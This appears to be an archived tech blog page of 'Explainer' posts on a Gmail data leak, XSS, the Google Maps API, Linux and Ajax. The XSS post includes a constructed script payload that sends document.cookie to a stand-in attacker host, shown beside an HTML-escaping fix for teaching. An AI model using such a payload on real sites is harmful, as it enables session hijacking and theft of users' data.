Gmail XSS vulnerability by Peter


Slashdot is reporting a hole in Gmail that could let an attacker read your entire Gmail contact list remotely. This type of vulnerability is commonly filed under Cross-Site Scripting, or XSS, although strictly what is described is a malicious third-party page reading your data through your logged-in Gmail session rather than script injected into Gmail's own pages; the press tends to lump the two together.

All it takes is to be logged in to Gmail (it doesn't even have to be open in a visible tab: the browser sends your Gmail cookies with every request to Gmail regardless) and to browse to a website carrying some malicious JavaScript. The loophole in Google's code means that site can siphon off your whole contact list through your own session.

This attack doesn't appear to be very widespread at the moment, and I have no doubt that Google will fix it very quickly, especially now that it has made the headlines.

This seems a perfect opportunity to explain XSS: some of the ways it can happen and how much of a problem it poses.
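To make the mechanism concrete, here is an added illustration of classic XSS. It is not Google's code and does not reproduce the Gmail hole; the search page, its URL and the attacker host are invented. The vulnerable renderer echoes user input straight into its HTML, so a script in the input runs as if the site had written it, with access to everything that site's pages can see; the hardened version HTML-encodes the input first.

```javascript
// Added illustration for this post; it is not Google's code and does not
// reproduce the Gmail hole. The page, URL and attacker host are invented.

// Vulnerable: a search page that echoes the query straight into its HTML.
// Whatever the query contains becomes part of the page's markup, so a
// <script> in the query runs as if the site itself had written it.
function renderSearchPageUnsafe(query) {
  return '<h1>Results for: ' + query + '</h1>';
}

// Hardened: HTML-encode the characters that can change how the browser
// parses the text before it is placed into the page.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSearchPageSafe(query) {
  return '<h1>Results for: ' + escapeHtml(query) + '</h1>';
}

// Crude detector used only to show the difference: is there a script
// element in the output that the page author never wrote?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input. A victim would receive it in a link such as
// http://victim-site.test/search?q=<this payload, URL-encoded> (made-up hosts).
// If it runs, it sends the victim's cookies for the vulnerable site to the
// attacker, which is the "siphon off your data" step described above.
const XSS_PAYLOAD =
  '<script>new Image().src="http://attacker.test/log?c="+document.cookie</script>';

console.log('unsafe:', renderSearchPageUnsafe(XSS_PAYLOAD));
console.log('safe:  ', renderSearchPageSafe(XSS_PAYLOAD));
```

One caveat a practitioner would add: `escapeHtml` is only correct for text placed between tags. Input that lands inside an attribute value, a URL or a script block needs the encoding appropriate to that context, and a single HTML-escape is not enough there.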

(more…)

Posted in Explainer, Uncategorized. January 1, 2007
Goggles, and why APIs can help build great applications by Peter

This post is another Explainer post, this time about APIs and what they can do. Through a couple of examples, by the end of it you should know what APIs are, how they are useful, and why they are popping up in so many Web 2.0 applications.
I found this site a while back, and it's a really cool demonstration of what the Google Maps API can do.

Goggles screenshot

It's called Goggles, and it's essentially a Flash-powered 'flight simulator' in which you fly over real satellite imagery and explore Google Maps with a little more finesse.

(Linux users: it requires Flash 8, which isn't available for Linux, but I found a workaround if you want to try this and other Flash 8 content.)

It's an impressive demonstration of what the Google Maps API can do, and certainly an interesting project. A lot of sites and web services use the Google Maps API (Frappr, for example, uses it for all of its maps), but this is the most inventive and most complex use of the API I have seen yet.

Google opened the API up so that site developers could build this sort of thing on top of Google's data, and a lot of Web 2.0 services also have (slightly less impressive) APIs; YouTube, for example, has one so that you can embed its videos on your own site.

So what exactly is an API? Find out after the jump.
(more…)

Posted in Explainer, Web 2.0. August 28, 2006
Linux Explained by Peter

First things first, this is another post in the Explainer series. So, if you know what Linux and free/open source software are and/or don’t need refreshing, then you can just skip straight over this post.

If you don't know what Linux is, or have only vaguely heard of it, this post is designed to give you a brief introduction to what Linux is, what the ideas behind it are, and how to give it a try (without wiping anything on your computer).

(more…)

Posted in Explainer. July 8, 2006
Ajax Explained by Huw

This is the first in my series of explainer posts. Ajax is the talk of the Web 2.0 world at the moment; it's seen by many as the 'must have' feature of any web service, and described by others as an over-hyped, over-used technology. But what is it? It stands for Asynchronous JavaScript and XML, and is essentially a way for a website to update what you see without you having to refresh the page: the browser fetches data from the server in the background and uses JavaScript to change just the part of the page that needs it. That makes it perfect for rich web applications, websites which aim to act as much like traditional desktop applications as possible.

A great example of the use of Ajax, compared with traditional techniques, is Gmail versus Hotmail. Gmail makes heavy use of Ajax, so if someone sends you an email while you are looking at your inbox, it appears there without you refreshing the page; archive a message and it disappears from your inbox, again without a refresh. This lets you work much faster, because you don't have to wait after every action, as you did in earlier webmail services like Hotmail, where every change of view meant reloading the page. The next version of Hotmail (currently in beta) is Windows Live Mail, and it uses lots of Ajax to create an experience as close to a conventional program such as Outlook as possible. Ajax is important because it is one of the major fuels of Web 2.0: without it, no-one would use services like Writely, because the experience would be so inefficient and so inferior to using a program such as Microsoft Word.
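The inbox-refresh pattern just described, as an added example that is not Gmail's or Hotmail's code. The server, its `/inbox/...` URLs and the JSON message format are assumptions made for illustration. The request itself goes through `XMLHttpRequest`, which only exists in a browser, so the update logic is separated from the transport and a constructed stand-in transport with canned replies lets the rest run anywhere.

```javascript
// Added illustration for this post (not Gmail's or Hotmail's code). The
// server, its /inbox/... URLs and the JSON message format are assumptions.

// Parse one poll response. The server is assumed to reply with
// {"messages":[{"id":"m2","from":"...","subject":"..."}]}.
// JSON.parse is used rather than eval(): eval would run whatever the
// response contained, JSON.parse only builds data.
function parseInboxResponse(text) {
  const data = JSON.parse(text);
  if (!data || !Array.isArray(data.messages)) {
    throw new Error('unexpected inbox response shape');
  }
  return data.messages;
}

// Merge fetched messages into the inbox already on screen. Only messages
// not yet shown are inserted (newest first); the returned list is what the
// page would add to the DOM, without a reload.
function mergeInbox(inbox, fetched) {
  const known = new Set(inbox.map((m) => m.id));
  const fresh = fetched.filter((m) => !known.has(m.id));
  inbox.unshift(...fresh);
  return fresh;
}

// Archive: drop the message from the view at once and tell the server in
// the background, so the user never waits for a page load.
function archiveMessage(inbox, id, transport) {
  const idx = inbox.findIndex((m) => m.id === id);
  if (idx === -1) return false;
  inbox.splice(idx, 1);
  transport.post('/inbox/archive', JSON.stringify({ id }), () => {});
  return true;
}

// One poll cycle: ask the server what is new, then merge it in. The
// callback receives (error, newMessages).
function pollInbox(inbox, transport, callback) {
  transport.get('/inbox/poll', (text) => {
    if (text === null) return callback(new Error('poll request failed'), []);
    let fetched;
    try {
      fetched = parseInboxResponse(text);
    } catch (err) {
      return callback(err, []);
    }
    callback(null, mergeInbox(inbox, fetched));
  });
}

// The real thing: XMLHttpRequest, the object that gives Ajax its "A".
// Only usable in a browser, so it is defined here but not called.
function xhrTransport() {
  function send(method, url, body, callback) {
    const xhr = new XMLHttpRequest();
    xhr.open(method, url, true); // true = asynchronous; the page stays usable
    xhr.onreadystatechange = () => {
      if (xhr.readyState === 4) callback(xhr.status === 200 ? xhr.responseText : null);
    };
    xhr.send(body);
  }
  return {
    get: (url, cb) => send('GET', url, null, cb),
    post: (url, body, cb) => send('POST', url, body, cb),
  };
}

// Constructed stand-in transport with canned replies so the example runs
// offline; it calls back synchronously, which is fine for the logic above.
function fakeTransport(replies) {
  return {
    get: (url, cb) => cb(url in replies ? replies[url] : null),
    post: (url, body, cb) => cb(true),
  };
}

// Demo with a constructed inbox and a constructed server reply.
const demoInbox = [{ id: 'm1', from: 'alice', subject: 'Hello' }];
const demoServer = fakeTransport({
  '/inbox/poll': '{"messages":[{"id":"m1","from":"alice","subject":"Hello"},' +
                 '{"id":"m2","from":"bob","subject":"Lunch?"}]}',
});
pollInbox(demoInbox, demoServer, (err, fresh) => {
  console.log('new messages:', err ? err.message : fresh.map((m) => m.subject));
});
archiveMessage(demoInbox, 'm1', demoServer);
console.log('inbox now:', demoInbox.map((m) => m.id)); // ['m2']
```

Two points worth keeping in mind from a security angle: the background request carries the user's cookies exactly like a normal page load, so a logged-in session is being used whether or not the user clicked anything; and the browser's same-origin policy is what stops a different site from reading such a response through `XMLHttpRequest`, which is the boundary to think about when reading the Gmail contact-list story above.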

For further specific information about how Ajax works, see Wikipedia. For examples of Ajax websites, just read Techcrunch, or have a look at this use of Ajax to power a remote desktop.

Posted in Explainer, Uncategorized. June 25, 2006
Explainer posts by Huw

I sometimes feel when I'm writing posts for Gizbuzz that I have to stop what I'm writing and explain it, just in case there are some readers who don't fully understand what's going on. I don't really want to have to do this as it can sometimes get in the way, so over the coming weeks I'll write some explainer posts on various concepts (e.g. AJAX) which hopefully will be interesting in themselves for some readers, and then they can be linked to from any posts which are talking about related uses of these technologies. So if you already know what things like AJAX are (which I imagine most of you do) then just glaze over. Otherwise, happy reading!

Posted in Explainer, Uncategorized. June 17, 2006